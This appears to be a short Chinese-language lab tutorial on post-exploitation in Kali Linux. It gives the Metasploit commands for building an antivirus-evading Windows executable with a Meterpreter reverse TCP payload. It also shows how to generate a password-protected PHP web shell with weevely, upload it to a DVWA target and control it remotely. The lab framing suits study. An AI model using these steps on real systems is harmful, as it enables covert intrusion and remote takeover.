在kali菜单项里的Post Exploitation(后渗透)里的OS Backdoors可以找到该工具
点击后其实是进入一个目录
然后利用python启动一个WEB服务器
在win测试机上启动power shell,同时打开一个浏览器,输入http://kali的IP:8000
msf框架里的evasion
- msfconsole
- show evasion // 查看免杀模块
- use evasion/windows/windows_defender_exe
- show options // 查看参数
- set filename test.exe //自己定义一个文件名,不然是随机起名
- set payload windows/meterpreter/reverse_tcp
- run
这是一个隐藏目录
可以使用命令
将文件移动到可视位置
学习时可以扔到https://www.virscan.org等平台检测一下
weevely只能生成PHP的网页木马 在kali里执行
weevely generate 123456 /home/kali/test.php
其中123456是密码
到靶机dvwa上传
上传成功后,根据页面提示的路径访问一下木马网页
回到kali,执行
- weevely http://192.168.107.130/dvwa/hackable/uploads/test.php 123456
- 密码要放在最后,且须与前面设置的一致
输入 help 查看可用的远程操作的命令